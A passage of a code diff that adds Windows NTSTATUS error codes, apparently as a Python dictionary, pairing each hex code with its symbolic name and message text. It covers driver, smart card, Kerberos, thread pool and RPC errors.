+ 0xC0000364: ("STATUS_ACCESS_DISABLED_BY_POLICY_OTHER","Access to %1 has been restricted by your Administrator by policy rule %2."),
+ 0xC0000365: ("STATUS_FAILED_DRIVER_ENTRY","The driver was not loaded because it failed its initialization call."),
+ 0xC0000366: ("STATUS_DEVICE_ENUMERATION_ERROR","The device encountered an error while applying power or reading the device configuration. This may be caused by a failure of your hardware or by a poor connection."),
+ 0xC0000368: ("STATUS_MOUNT_POINT_NOT_RESOLVED","The create operation failed because the name contained at least one mount point that resolves to a volume to which the specified device object is not attached."),
+ 0xC0000369: ("STATUS_INVALID_DEVICE_OBJECT_PARAMETER","The device object parameter is either not a valid device object or is not attached to the volume that is specified by the file name."),
+ 0xC000036A: ("STATUS_MCA_OCCURED","A machine check error has occurred. Check the system event log for additional information."),
+ 0xC000036B: ("STATUS_DRIVER_BLOCKED_CRITICAL","Driver %2 has been blocked from loading."),
+ 0xC000036C: ("STATUS_DRIVER_BLOCKED","Driver %2 has been blocked from loading."),
+ 0xC000036D: ("STATUS_DRIVER_DATABASE_ERROR","There was error [%2] processing the driver database."),
+ 0xC000036E: ("STATUS_SYSTEM_HIVE_TOO_LARGE","System hive size has exceeded its limit."),
+ 0xC000036F: ("STATUS_INVALID_IMPORT_OF_NON_DLL","A dynamic link library (DLL) referenced a module that was neither a DLL nor the process's executable image."),
+ 0xC0000371: ("STATUS_NO_SECRETS","The local account store does not contain secret material for the specified account."),
+ 0xC0000372: ("STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY","Access to %1 has been restricted by your Administrator by policy rule %2."),
+ 0xC0000373: ("STATUS_FAILED_STACK_SWITCH","The system was not able to allocate enough memory to perform a stack switch."),
+ 0xC0000374: ("STATUS_HEAP_CORRUPTION","A heap has been corrupted."),
+ 0xC0000380: ("STATUS_SMARTCARD_WRONG_PIN","An incorrect PIN was presented to the smart card."),
+ 0xC0000381: ("STATUS_SMARTCARD_CARD_BLOCKED","The smart card is blocked."),
+ 0xC0000382: ("STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED","No PIN was presented to the smart card."),
+ 0xC0000383: ("STATUS_SMARTCARD_NO_CARD","No smart card is available."),
+ 0xC0000384: ("STATUS_SMARTCARD_NO_KEY_CONTAINER","The requested key container does not exist on the smart card."),
+ 0xC0000385: ("STATUS_SMARTCARD_NO_CERTIFICATE","The requested certificate does not exist on the smart card."),
+ 0xC0000386: ("STATUS_SMARTCARD_NO_KEYSET","The requested keyset does not exist."),
+ 0xC0000387: ("STATUS_SMARTCARD_IO_ERROR","A communication error with the smart card has been detected."),
+ 0xC0000388: ("STATUS_DOWNGRADE_DETECTED","The system detected a possible attempt to compromise security. Ensure that you can contact the server that authenticated you."),
+ 0xC0000389: ("STATUS_SMARTCARD_CERT_REVOKED","The smart card certificate used for authentication has been revoked. Contact your system administrator. There may be additional information in the event log."),
+ 0xC000038A: ("STATUS_ISSUING_CA_UNTRUSTED","An untrusted certificate authority was detected while processing the smart card certificate that is used for authentication. Contact your system administrator."),
+ 0xC000038B: ("STATUS_REVOCATION_OFFLINE_C","The revocation status of the smart card certificate that is used for authentication could not be determined. Contact your system administrator."),
+ 0xC000038C: ("STATUS_PKINIT_CLIENT_FAILURE","The smart card certificate used for authentication was not trusted. Contact your system administrator."),
+ 0xC000038D: ("STATUS_SMARTCARD_CERT_EXPIRED","The smart card certificate used for authentication has expired. Contact your system administrator."),
+ 0xC000038E: ("STATUS_DRIVER_FAILED_PRIOR_UNLOAD","The driver could not be loaded because a previous version of the driver is still in memory."),
+ 0xC000038F: ("STATUS_SMARTCARD_SILENT_CONTEXT","The smart card provider could not perform the action because the context was acquired as silent."),
+ 0xC0000401: ("STATUS_PER_USER_TRUST_QUOTA_EXCEEDED","The delegated trust creation quota of the current user has been exceeded."),
+ 0xC0000402: ("STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED","The total delegated trust creation quota has been exceeded."),
+ 0xC0000403: ("STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED","The delegated trust deletion quota of the current user has been exceeded."),
+ 0xC0000404: ("STATUS_DS_NAME_NOT_UNIQUE","The requested name already exists as a unique identifier."),
+ 0xC0000405: ("STATUS_DS_DUPLICATE_ID_FOUND","The requested object has a non-unique identifier and cannot be retrieved."),
+ 0xC0000406: ("STATUS_DS_GROUP_CONVERSION_ERROR","The group cannot be converted due to attribute restrictions on the requested group type."),
+ 0xC0000407: ("STATUS_VOLSNAP_PREPARE_HIBERNATE","{Volume Shadow Copy Service} Wait while the Volume Shadow Copy Service prepares volume %hs for hibernation."),
+ 0xC0000408: ("STATUS_USER2USER_REQUIRED","Kerberos sub-protocol User2User is required."),
+ 0xC0000409: ("STATUS_STACK_BUFFER_OVERRUN","The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application."),
+ 0xC000040A: ("STATUS_NO_S4U_PROT_SUPPORT","The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user."),
+ 0xC000040B: ("STATUS_CROSSREALM_DELEGATION_FAILURE","An attempt was made by this server to make a Kerberos constrained delegation request for a target that is outside the server realm. This action is not supported and the resulting error indicates a misconfiguration on the allowed-to-delegate-to list for this server. Contact your administrator."),
+ 0xC000040C: ("STATUS_REVOCATION_OFFLINE_KDC","The revocation status of the domain controller certificate used for smart card authentication could not be determined. There is additional information in the system event log. Contact your system administrator."),
+ 0xC000040D: ("STATUS_ISSUING_CA_UNTRUSTED_KDC","An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Contact your system administrator."),
+ 0xC000040E: ("STATUS_KDC_CERT_EXPIRED","The domain controller certificate used for smart card logon has expired. Contact your system administrator with the contents of your system event log."),
+ 0xC000040F: ("STATUS_KDC_CERT_REVOKED","The domain controller certificate used for smart card logon has been revoked. Contact your system administrator with the contents of your system event log."),
+ 0xC0000410: ("STATUS_PARAMETER_QUOTA_EXCEEDED","Data present in one of the parameters is more than the function can operate on."),
+ 0xC0000411: ("STATUS_HIBERNATION_FAILURE","The system has failed to hibernate (The error code is %hs). Hibernation will be disabled until the system is restarted."),
+ 0xC0000412: ("STATUS_DELAY_LOAD_FAILED","An attempt to delay-load a .dll or get a function address in a delay-loaded .dll failed."),
+ 0xC0000413: ("STATUS_AUTHENTICATION_FIREWALL_FAILED","Logon Failure: The machine you are logging onto is protected by an authentication firewall. The specified account is not allowed to authenticate to the machine."),
+ 0xC0000414: ("STATUS_VDM_DISALLOWED","%hs is a 16-bit application. You do not have permissions to execute 16-bit applications. Check your permissions with your system administrator."),
+ 0xC0000415: ("STATUS_HUNG_DISPLAY_DRIVER_THREAD","{Display Driver Stopped Responding} The %hs display driver has stopped working normally. Save your work and reboot the system to restore full display functionality. The next time you reboot the machine a dialog will be displayed giving you a chance to report this failure to Microsoft."),
+ 0xC0000416: ("STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE","The Desktop heap encountered an error while allocating session memory. There is more information in the system event log."),
+ 0xC0000417: ("STATUS_INVALID_CRUNTIME_PARAMETER","An invalid parameter was passed to a C runtime function."),
+ 0xC0000418: ("STATUS_NTLM_BLOCKED","The authentication failed because NTLM was blocked."),
+ 0xC0000419: ("STATUS_DS_SRC_SID_EXISTS_IN_FOREST","The source object's SID already exists in destination forest."),
+ 0xC000041A: ("STATUS_DS_DOMAIN_NAME_EXISTS_IN_FOREST","The domain name of the trusted domain already exists in the forest."),
+ 0xC000041B: ("STATUS_DS_FLAT_NAME_EXISTS_IN_FOREST","The flat name of the trusted domain already exists in the forest."),
+ 0xC000041C: ("STATUS_INVALID_USER_PRINCIPAL_NAME","The User Principal Name (UPN) is invalid."),
+ 0xC0000420: ("STATUS_ASSERTION_FAILURE","There has been an assertion failure."),
+ 0xC0000421: ("STATUS_VERIFIER_STOP","Application verifier has found an error in the current process."),
+ 0xC0000423: ("STATUS_CALLBACK_POP_STACK","A user mode unwind is in progress."),
+ 0xC0000424: ("STATUS_INCOMPATIBLE_DRIVER_BLOCKED","%2 has been blocked from loading due to incompatibility with this system. Contact your software vendor for a compatible version of the driver."),
+ 0xC0000425: ("STATUS_HIVE_UNLOADED","Illegal operation attempted on a registry key which has already been unloaded."),
+ 0xC0000426: ("STATUS_COMPRESSION_DISABLED","Compression is disabled for this volume."),
+ 0xC0000427: ("STATUS_FILE_SYSTEM_LIMITATION","The requested operation could not be completed due to a file system limitation."),
+ 0xC0000428: ("STATUS_INVALID_IMAGE_HASH","The hash for image %hs cannot be found in the system catalogs. The image is likely corrupt or the victim of tampering."),
+ 0xC0000429: ("STATUS_NOT_CAPABLE","The implementation is not capable of performing the request."),
+ 0xC000042A: ("STATUS_REQUEST_OUT_OF_SEQUENCE","The requested operation is out of order with respect to other operations."),
+ 0xC000042B: ("STATUS_IMPLEMENTATION_LIMIT","An operation attempted to exceed an implementation-defined limit."),
+ 0xC000042C: ("STATUS_ELEVATION_REQUIRED","The requested operation requires elevation."),
+ 0xC000042D: ("STATUS_NO_SECURITY_CONTEXT","The required security context does not exist."),
+ 0xC000042E: ("STATUS_PKU2U_CERT_FAILURE","The PKU2U protocol encountered an error while attempting to utilize the associated certificates."),
+ 0xC0000432: ("STATUS_BEYOND_VDL","The operation was attempted beyond the valid data length of the file."),
+ 0xC0000433: ("STATUS_ENCOUNTERED_WRITE_IN_PROGRESS","The attempted write operation encountered a write already in progress for some portion of the range."),
+ 0xC0000434: ("STATUS_PTE_CHANGED","The page fault mappings changed in the middle of processing a fault so the operation must be retried."),
+ 0xC0000435: ("STATUS_PURGE_FAILED","The attempt to purge this file from memory failed to purge some or all the data from memory."),
+ 0xC0000440: ("STATUS_CRED_REQUIRES_CONFIRMATION","The requested credential requires confirmation."),
+ 0xC0000441: ("STATUS_CS_ENCRYPTION_INVALID_SERVER_RESPONSE","The remote server sent an invalid response for a file being opened with Client Side Encryption."),
+ 0xC0000442: ("STATUS_CS_ENCRYPTION_UNSUPPORTED_SERVER","Client Side Encryption is not supported by the remote server even though it claims to support it."),
+ 0xC0000443: ("STATUS_CS_ENCRYPTION_EXISTING_ENCRYPTED_FILE","File is encrypted and should be opened in Client Side Encryption mode."),
+ 0xC0000444: ("STATUS_CS_ENCRYPTION_NEW_ENCRYPTED_FILE","A new encrypted file is being created and a $EFS needs to be provided."),
+ 0xC0000445: ("STATUS_CS_ENCRYPTION_FILE_NOT_CSE","The SMB client requested a CSE FSCTL on a non-CSE file."),
+ 0xC0000446: ("STATUS_INVALID_LABEL","Indicates a particular Security ID may not be assigned as the label of an object."),
+ 0xC0000450: ("STATUS_DRIVER_PROCESS_TERMINATED","The process hosting the driver for this device has terminated."),
+ 0xC0000451: ("STATUS_AMBIGUOUS_SYSTEM_DEVICE","The requested system device cannot be identified due to multiple indistinguishable devices potentially matching the identification criteria."),
+ 0xC0000452: ("STATUS_SYSTEM_DEVICE_NOT_FOUND","The requested system device cannot be found."),
+ 0xC0000453: ("STATUS_RESTART_BOOT_APPLICATION","This boot application must be restarted."),
+ 0xC0000454: ("STATUS_INSUFFICIENT_NVRAM_RESOURCES","Insufficient NVRAM resources exist to complete the API. A reboot might be required."),
+ 0xC0000500: ("STATUS_INVALID_TASK_NAME","The specified task name is invalid."),
+ 0xC0000501: ("STATUS_INVALID_TASK_INDEX","The specified task index is invalid."),
+ 0xC0000502: ("STATUS_THREAD_ALREADY_IN_TASK","The specified thread is already joining a task."),
+ 0xC0000503: ("STATUS_CALLBACK_BYPASS","A callback has requested to bypass native code."),
+ 0xC0000602: ("STATUS_FAIL_FAST_EXCEPTION","A fail fast exception occurred. Exception handlers will not be invoked and the process will be terminated immediately."),
+ 0xC0000603: ("STATUS_IMAGE_CERT_REVOKED","Windows cannot verify the digital signature for this file. The signing certificate for this file has been revoked."),
+ 0xC0000700: ("STATUS_PORT_CLOSED","The ALPC port is closed."),
+ 0xC0000701: ("STATUS_MESSAGE_LOST","The ALPC message requested is no longer available."),
+ 0xC0000702: ("STATUS_INVALID_MESSAGE","The ALPC message supplied is invalid."),
+ 0xC0000703: ("STATUS_REQUEST_CANCELED","The ALPC message has been canceled."),
+ 0xC0000704: ("STATUS_RECURSIVE_DISPATCH","Invalid recursive dispatch attempt."),
+ 0xC0000705: ("STATUS_LPC_RECEIVE_BUFFER_EXPECTED","No receive buffer has been supplied in a synchronous request."),
+ 0xC0000706: ("STATUS_LPC_INVALID_CONNECTION_USAGE","The connection port is used in an invalid context."),
+ 0xC0000707: ("STATUS_LPC_REQUESTS_NOT_ALLOWED","The ALPC port does not accept new request messages."),
+ 0xC0000708: ("STATUS_RESOURCE_IN_USE","The resource requested is already in use."),
+ 0xC0000709: ("STATUS_HARDWARE_MEMORY_ERROR","The hardware has reported an uncorrectable memory error."),
+ 0xC000070A: ("STATUS_THREADPOOL_HANDLE_EXCEPTION","Status 0x%08x was returned, waiting on handle 0x%x for wait 0x%p, in waiter 0x%p."),
+ 0xC000070B: ("STATUS_THREADPOOL_SET_EVENT_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to Set event(0x%p) failed with status 0x%08x."),
+ 0xC000070C: ("STATUS_THREADPOOL_RELEASE_SEMAPHORE_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to ReleaseSemaphore(0x%p, %d) failed with status 0x%08x."),
+ 0xC000070D: ("STATUS_THREADPOOL_RELEASE_MUTEX_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to ReleaseMutex(%p) failed with status 0x%08x."),
+ 0xC000070E: ("STATUS_THREADPOOL_FREE_LIBRARY_ON_COMPLETION_FAILED","After a callback to 0x%p(0x%p), a completion call to FreeLibrary(%p) failed with status 0x%08x."),
+ 0xC000070F: ("STATUS_THREADPOOL_RELEASED_DURING_OPERATION","The thread pool 0x%p was released while a thread was posting a callback to 0x%p(0x%p) to it."),
+ 0xC0000710: ("STATUS_CALLBACK_RETURNED_WHILE_IMPERSONATING","A thread pool worker thread is impersonating a client, after a callback to 0x%p(0x%p). This is unexpected, indicating that the callback is missing a call to revert the impersonation."),
+ 0xC0000711: ("STATUS_APC_RETURNED_WHILE_IMPERSONATING","A thread pool worker thread is impersonating a client, after executing an APC. This is unexpected, indicating that the APC is missing a call to revert the impersonation."),
+ 0xC0000712: ("STATUS_PROCESS_IS_PROTECTED","Either the target process, or the target thread's containing process, is a protected process."),
+ 0xC0000713: ("STATUS_MCA_EXCEPTION","A thread is getting dispatched with MCA EXCEPTION because of MCA."),
+ 0xC0000714: ("STATUS_CERTIFICATE_MAPPING_NOT_UNIQUE","The client certificate account mapping is not unique."),
+ 0xC0000715: ("STATUS_SYMLINK_CLASS_DISABLED","The symbolic link cannot be followed because its type is disabled."),
+ 0xC0000716: ("STATUS_INVALID_IDN_NORMALIZATION","Indicates that the specified string is not valid for IDN normalization."),
+ 0xC0000717: ("STATUS_NO_UNICODE_TRANSLATION","No mapping for the Unicode character exists in the target multi-byte code page."),
+ 0xC0000718: ("STATUS_ALREADY_REGISTERED","The provided callback is already registered."),
+ 0xC0000719: ("STATUS_CONTEXT_MISMATCH","The provided context did not match the target."),
+ 0xC000071A: ("STATUS_PORT_ALREADY_HAS_COMPLETION_LIST","The specified port already has a completion list."),
+ 0xC000071B: ("STATUS_CALLBACK_RETURNED_THREAD_PRIORITY","A threadpool worker thread entered a callback at thread base priority 0x%x and exited at priority 0x%x. This is unexpected, indicating that the callback missed restoring the priority."),
+ 0xC000071C: ("STATUS_INVALID_THREAD","An invalid thread, handle %p, is specified for this operation. Possibly, a threadpool worker thread was specified."),
+ 0xC000071D: ("STATUS_CALLBACK_RETURNED_TRANSACTION","A threadpool worker thread entered a callback, which left transaction state. This is unexpected, indicating that the callback missed clearing the transaction."),
+ 0xC000071E: ("STATUS_CALLBACK_RETURNED_LDR_LOCK","A threadpool worker thread entered a callback, which left the loader lock held. This is unexpected, indicating that the callback missed releasing the lock."),
+ 0xC000071F: ("STATUS_CALLBACK_RETURNED_LANG","A threadpool worker thread entered a callback, which left with preferred languages set. This is unexpected, indicating that the callback missed clearing them."),
+ 0xC0000720: ("STATUS_CALLBACK_RETURNED_PRI_BACK","A threadpool worker thread entered a callback, which left with background priorities set. This is unexpected, indicating that the callback missed restoring the original priorities."),
+ 0xC0000800: ("STATUS_DISK_REPAIR_DISABLED","The attempted operation required self healing to be enabled."),
+ 0xC0000801: ("STATUS_DS_DOMAIN_RENAME_IN_PROGRESS","The directory service cannot perform the requested operation because a domain rename operation is in progress."),
+ 0xC0000802: ("STATUS_DISK_QUOTA_EXCEEDED","An operation failed because the storage quota was exceeded."),
+ 0xC0000804: ("STATUS_CONTENT_BLOCKED","An operation failed because the content was blocked."),
+ 0xC0000805: ("STATUS_BAD_CLUSTERS","The operation could not be completed due to bad clusters on disk."),
+ 0xC0000806: ("STATUS_VOLUME_DIRTY","The operation could not be completed because the volume is dirty. Please run the Chkdsk utility and try again."),
+ 0xC0000901: ("STATUS_FILE_CHECKED_OUT","This file is checked out or locked for editing by another user."),
+ 0xC0000902: ("STATUS_CHECKOUT_REQUIRED","The file must be checked out before saving changes."),
+ 0xC0000903: ("STATUS_BAD_FILE_TYPE","The file type being saved or retrieved has been blocked."),
+ 0xC0000904: ("STATUS_FILE_TOO_LARGE","The file size exceeds the limit allowed and cannot be saved."),
+ 0xC0000905: ("STATUS_FORMS_AUTH_REQUIRED","Access Denied. Before opening files in this location, you must first browse to the e.g. site and select the option to log on automatically."),
+ 0xC0000906: ("STATUS_VIRUS_INFECTED","The operation did not complete successfully because the file contains a virus."),
+ 0xC0000907: ("STATUS_VIRUS_DELETED","This file contains a virus and cannot be opened. Due to the nature of this virus, the file has been removed from this location."),
+ 0xC0000908: ("STATUS_BAD_MCFG_TABLE","The resources required for this device conflict with the MCFG table."),
+ 0xC0000909: ("STATUS_CANNOT_BREAK_OPLOCK","The operation did not complete successfully because it would cause an oplock to be broken. The caller has requested that existing oplocks not be broken."),
+ 0xC0009898: ("STATUS_WOW_ASSERTION","WOW Assertion Error."),
+ 0xC000A000: ("STATUS_INVALID_SIGNATURE","The cryptographic signature is invalid."),
+ 0xC000A001: ("STATUS_HMAC_NOT_SUPPORTED","The cryptographic provider does not support HMAC."),
+ 0xC000A010: ("STATUS_IPSEC_QUEUE_OVERFLOW","The IPsec queue overflowed."),
+ 0xC000A011: ("STATUS_ND_QUEUE_OVERFLOW","The neighbor discovery queue overflowed."),
+ 0xC000A012: ("STATUS_HOPLIMIT_EXCEEDED","An Internet Control Message Protocol (ICMP) hop limit exceeded error was received."),
+ 0xC000A013: ("STATUS_PROTOCOL_NOT_SUPPORTED","The protocol is not installed on the local machine."),
+ 0xC000A080: ("STATUS_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error may be caused by network connectivity issues. Try to save this file elsewhere."),
+ 0xC000A081: ("STATUS_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error was returned by the server on which the file exists. Try to save this file elsewhere."),
+ 0xC000A082: ("STATUS_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR","{Delayed Write Failed} Windows was unable to save all the data for the file %hs; the data has been lost. This error may be caused if the device has been removed or the media is write-protected."),
+ 0xC000A083: ("STATUS_XML_PARSE_ERROR","Windows was unable to parse the requested XML data."),
+ 0xC000A084: ("STATUS_XMLDSIG_ERROR","An error was encountered while processing an XML digital signature."),
+ 0xC000A085: ("STATUS_WRONG_COMPARTMENT","This indicates that the caller made the connection request in the wrong routing compartment."),
+ 0xC000A086: ("STATUS_AUTHIP_FAILURE","This indicates that there was an AuthIP failure when attempting to connect to the remote host."),
+ 0xC000A087: ("STATUS_DS_OID_MAPPED_GROUP_CANT_HAVE_MEMBERS","OID mapped groups cannot have members."),
+ 0xC000A088: ("STATUS_DS_OID_NOT_FOUND","The specified OID cannot be found."),
+ 0xC000A100: ("STATUS_HASH_NOT_SUPPORTED","Hash generation for the specified version and hash type is not enabled on server."),
+ 0xC000A101: ("STATUS_HASH_NOT_PRESENT","The hash requests is not present or not up to date with the current file contents."),
+ 0xC0010001: ("DBG_NO_STATE_CHANGE","The debugger did not perform a state change."),
+ 0xC0010002: ("DBG_APP_NOT_IDLE","The debugger found that the application is not idle."),
+ 0xC0020001: ("RPC_NT_INVALID_STRING_BINDING","The string binding is invalid."),
+ 0xC0020002: ("RPC_NT_WRONG_KIND_OF_BINDING","The binding handle is not the correct type."),
+ 0xC0020003: ("RPC_NT_INVALID_BINDING","The binding handle is invalid."),
+ 0xC0020004: ("RPC_NT_PROTSEQ_NOT_SUPPORTED","The RPC protocol sequence is not supported."),
+ 0xC0020005: ("RPC_NT_INVALID_RPC_PROTSEQ","The RPC protocol sequence is invalid."),
+ 0xC0020006: ("RPC_NT_INVALID_STRING_UUID","The string UUID is invalid."),
+ 0xC0020007: ("RPC_NT_INVALID_ENDPOINT_FORMAT","The endpoint format is invalid."),
+ 0xC0020008: ("RPC_NT_INVALID_NET_ADDR","The network address is invalid."),
+ 0xC0020009: ("RPC_NT_NO_ENDPOINT_FOUND","No endpoint was found."),
+ 0xC002000A: ("RPC_NT_INVALID_TIMEOUT","The time-out value is invalid."),
+ 0xC002000B: ("RPC_NT_OBJECT_NOT_FOUND","The object UUID was not found."),
+ 0xC002000C: ("RPC_NT_ALREADY_REGISTERED","The object UUID has already been registered."),
+ 0xC002000D: ("RPC_NT_TYPE_ALREADY_REGISTERED","The type UUID has already been registered."),
+ 0xC002000E: ("RPC_NT_ALREADY_LISTENING","The RPC server is already listening."),
+ 0xC002000F: ("RPC_NT_NO_PROTSEQS_REGISTERED","No protocol sequences have been registered."),
+ 0xC0020010: ("RPC_NT_NOT_LISTENING","The RPC server is not listening."),
+ 0xC0020011: ("RPC_NT_UNKNOWN_MGR_TYPE","The manager type is unknown."),
+ 0xC0020012: ("RPC_NT_UNKNOWN_IF","The interface is unknown."),
+ 0xC0020013: ("RPC_NT_NO_BINDINGS","There are no bindings."),
+ 0xC0020014: ("RPC_NT_NO_PROTSEQS","There are no protocol sequences."),
+ 0xC0020015: ("RPC_NT_CANT_CREATE_ENDPOINT","The endpoint cannot be created."),
+ 0xC0020016: ("RPC_NT_OUT_OF_RESOURCES","Insufficient resources are available to complete this operation."),
+ 0xC0020017: ("RPC_NT_SERVER_UNAVAILABLE","The RPC server is unavailable."),
+ 0xC0020018: ("RPC_NT_SERVER_TOO_BUSY","The RPC server is too busy to complete this operation."),
+ 0xC0020019: ("RPC_NT_INVALID_NETWORK_OPTIONS","The network options are invalid."),
+ 0xC002001A: ("RPC_NT_NO_CALL_ACTIVE","No RPCs are active on this thread."),
+ 0xC002001B: ("RPC_NT_CALL_FAILED","The RPC failed."),
+ 0xC002001C: ("RPC_NT_CALL_FAILED_DNE","The RPC failed and did not execute."),
+ 0xC002001D: ("RPC_NT_PROTOCOL_ERROR","An RPC protocol error occurred."),
+ 0xC002001F: ("RPC_NT_UNSUPPORTED_TRANS_SYN","The RPC server does not support the transfer syntax."),
+ 0xC0020021: ("RPC_NT_UNSUPPORTED_TYPE","The type UUID is not supported."),
+ 0xC0020022: ("RPC_NT_INVALID_TAG","The tag is invalid."),
+ 0xC0020023: ("RPC_NT_INVALID_BOUND","The array bounds are invalid."),
+ 0xC0020024: ("RPC_NT_NO_ENTRY_NAME","The binding does not contain an entry name."),
+ 0xC0020025: ("RPC_NT_INVALID_NAME_SYNTAX","The name syntax is invalid."),
+ 0xC0020026: ("RPC_NT_UNSUPPORTED_NAME_SYNTAX","The name syntax is not supported."),
+ 0xC0020028: ("RPC_NT_UUID_NO_ADDRESS","No network address is available to construct a UUID."),
+ 0xC0020029: ("RPC_NT_DUPLICATE_ENDPOINT","The endpoint is a duplicate."),
+ 0xC002002A: ("RPC_NT_UNKNOWN_AUTHN_TYPE","The authentication type is unknown."),
+ 0xC002002B: ("RPC_NT_MAX_CALLS_TOO_SMALL","The maximum number of calls is too small."),
+ 0xC002002C: ("RPC_NT_STRING_TOO_LONG","The string is too long."),
+ 0xC002002D: ("RPC_NT_PROTSEQ_NOT_FOUND","The RPC protocol sequence was not found."),
+ 0xC002002E: ("RPC_NT_PROCNUM_OUT_OF_RANGE","The procedure number is out of range."),
+ 0xC002002F: ("RPC_NT_BINDING_HAS_NO_AUTH","The binding does not contain any authentication information."),
+ 0xC0020030: ("RPC_NT_UNKNOWN_AUTHN_SERVICE","The authentication service is unknown."),
+ 0xC0020031: ("RPC_NT_UNKNOWN_AUTHN_LEVEL","The authentication level is unknown."),
+ 0xC0020032: ("RPC_NT_INVALID_AUTH_IDENTITY","The security context is invalid."),
+ 0xC0020033: ("RPC_NT_UNKNOWN_AUTHZ_SERVICE","The authorization service is unknown."),
+ 0xC0020034: ("EPT_NT_INVALID_ENTRY","The entry is invalid."),
+ 0xC0020035: ("EPT_NT_CANT_PERFORM_OP","The operation cannot be performed."),
+ 0xC0020036: ("EPT_NT_NOT_REGISTERED","No more endpoints are available from the endpoint mapper."),
+ 0xC0020037: ("RPC_NT_NOTHING_TO_EXPORT","No interfaces have been exported."),
+ 0xC0020038: ("RPC_NT_INCOMPLETE_NAME","The entry name is incomplete."),
+ 0xC0020039: ("RPC_NT_INVALID_VERS_OPTION","The version option is invalid."),
+ 0xC002003A: ("RPC_NT_NO_MORE_MEMBERS","There are no more members."),
+ 0xC002003B: ("RPC_NT_NOT_ALL_OBJS_UNEXPORTED","There is nothing to unexport."),
+ 0xC002003C: ("RPC_NT_INTERFACE_NOT_FOUND","The interface was not found."),
+ 0xC002003D: ("RPC_NT_ENTRY_ALREADY_EXISTS","The entry already exists."),
+ 0xC002003E: ("RPC_NT_ENTRY_NOT_FOUND","The entry was not found."),
+ 0xC002003F: ("RPC_NT_NAME_SERVICE_UNAVAILABLE","The name service is unavailable."),
+ 0xC0020040: ("RPC_NT_INVALID_NAF_ID","The network address family is invalid."),
+ 0xC0020041: ("RPC_NT_CANNOT_SUPPORT","The requested operation is not supported."),
+ 0xC0020042: ("RPC_NT_NO_CONTEXT_AVAILABLE","No security context is available to allow impersonation."),
+ 0xC0020043: ("RPC_NT_INTERNAL_ERROR","An internal error occurred in the RPC."),
+ 0xC0020044: ("RPC_NT_ZERO_DIVIDE","The RPC server attempted to divide an integer by zero."),
+ 0xC0020045: ("RPC_NT_ADDRESS_ERROR","An addressing error occurred in the RPC server."),
+ 0xC0020046: ("RPC_NT_FP_DIV_ZERO","A floating point operation at the RPC server caused a divide by zero."),
+ 0xC0020047: ("RPC_NT_FP_UNDERFLOW","A floating point underflow occurred at the RPC server."),
+ 0xC0020048: ("RPC_NT_FP_OVERFLOW","A floating point overflow occurred at the RPC server."),
+ 0xC0020049: ("RPC_NT_CALL_IN_PROGRESS","An RPC is already in progress for this thread."),
+ 0xC002004A: ("RPC_NT_NO_MORE_BINDINGS","There are no more bindings."),
+ 0xC002004B: ("RPC_NT_GROUP_MEMBER_NOT_FOUND","The group member was not found."),
+ 0xC002004C: ("EPT_NT_CANT_CREATE","The endpoint mapper database entry could not be created."),
+ 0xC002004D: ("RPC_NT_INVALID_OBJECT","The object UUID is the nil UUID."),
+ 0xC002004F: ("RPC_NT_NO_INTERFACES","No interfaces have been registered."),
+ 0xC0020050: ("RPC_NT_CALL_CANCELLED","The RPC was canceled."),
+ 0xC0020051: ("RPC_NT_BINDING_INCOMPLETE","The binding handle does not contain all the required information."),
+ 0xC0020052: ("RPC_NT_COMM_FAILURE","A communications failure occurred during an RPC."),
+ 0xC0020053: ("RPC_NT_UNSUPPORTED_AUTHN_LEVEL","The requested authentication level is not supported."),
+ 0xC0020054: ("RPC_NT_NO_PRINC_NAME","No principal name was registered."),
+ 0xC0020055: ("RPC_NT_NOT_RPC_ERROR","The error specified is not a valid Windows RPC error code."),
+ 0xC0020057: ("RPC_NT_SEC_PKG_ERROR","A security package-specific error occurred."),
+ 0xC0020058: ("RPC_NT_NOT_CANCELLED","The thread was not canceled."),
+ 0xC0020062: ("RPC_NT_INVALID_ASYNC_HANDLE","Invalid asynchronous RPC handle."),
+ 0xC0020063: ("RPC_NT_INVALID_ASYNC_CALL","Invalid asynchronous RPC call handle for this operation."),
+ 0xC0020064: ("RPC_NT_PROXY_ACCESS_DENIED","Access to the HTTP proxy is denied."),
+ 0xC0021007: ("RPC_P_RECEIVE_ALERTED","No description"),
+ 0xC0021008: ("RPC_P_CONNECTION_CLOSED","No description"),
+ 0xC0021009: ("RPC_P_RECEIVE_FAILED","No description"),
+ 0xC002100A: ("RPC_P_SEND_FAILED","No description"),
+ 0xC002100B: ("RPC_P_TIMEOUT","No description"),
+ 0xC002100C: ("RPC_P_SERVER_TRANSPORT_ERROR","No description"),
+ 0xC002100E: ("RPC_P_EXCEPTION_OCCURED","No description"),
+ 0xC0021012: ("RPC_P_CONNECTION_SHUTDOWN","No description"),
+ 0xC0021015: ("RPC_P_THREAD_LISTENING","No description"),
+ 0xC0030001: ("RPC_NT_NO_MORE_ENTRIES","The list of RPC servers available for auto-handle binding has been exhausted."),
+ 0xC0030002: ("RPC_NT_SS_CHAR_TRANS_OPEN_FAIL","The file designated by DCERPCCHARTRANS cannot be opened."),
+ 0xC0030003: ("RPC_NT_SS_CHAR_TRANS_SHORT_FILE","The file containing the character translation table has fewer than 512 bytes."),
+ 0xC0030004: ("RPC_NT_SS_IN_NULL_CONTEXT","A null context handle is passed as an [in] parameter."),
+ 0xC0030005: ("RPC_NT_SS_CONTEXT_MISMATCH","The context handle does not match any known context handles."),
+ 0xC0030006: ("RPC_NT_SS_CONTEXT_DAMAGED","The context handle changed during a call."),
